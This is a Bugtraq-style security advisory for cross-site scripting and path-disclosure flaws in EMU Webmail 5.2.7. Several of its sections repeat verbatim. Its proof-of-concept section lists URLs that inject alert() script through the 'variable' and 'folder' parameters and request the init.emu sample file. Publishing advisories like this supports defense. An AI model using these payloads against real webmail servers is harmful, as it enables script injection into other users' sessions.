Emumail EMU Webmail Multiple Vulnerabilities
BID:9861
Info
Emumail EMU Webmail Multiple Vulnerabilities
| Bugtraq ID: | 9861 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 12 2004 12:00AM |
| Updated: | Mar 12 2004 12:00AM |
| Credit: | Discovery is credited to Dr_insane <[email protected]>. |
| Vulnerable: |
EMUMail EMU Webmail 5.2.7 |
| Not Vulnerable: | |
Discussion
Emumail EMU Webmail Multiple Vulnerabilities
Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.
EMU Webmail 5.2.7 has been reported to be affected by these issues.
Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out cross-site scripting attacks and disclose the path to the victim's home directory. The issues are reported to exist in the login script, 'emumail.fcgi' script and the 'init.emu' sample script.
EMU Webmail 5.2.7 has been reported to be affected by these issues.
Exploit / POC
Emumail EMU Webmail Multiple Vulnerabilities
The following proof of concept has been provided:
http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
http://www.example.com/webmail/init.emu
The following proof of concept has been provided:
http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
http://www.example.com/webmail/init.emu
Solution / Fix
Emumail EMU Webmail Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Emumail EMU Webmail Multiple Vulnerabilities
References:
References:
- EMU Webmail Product Page (Emumail)
- EMUMAIL 5.2.7 cross site scripting & path exposure vulnerabilities (Dr_insane)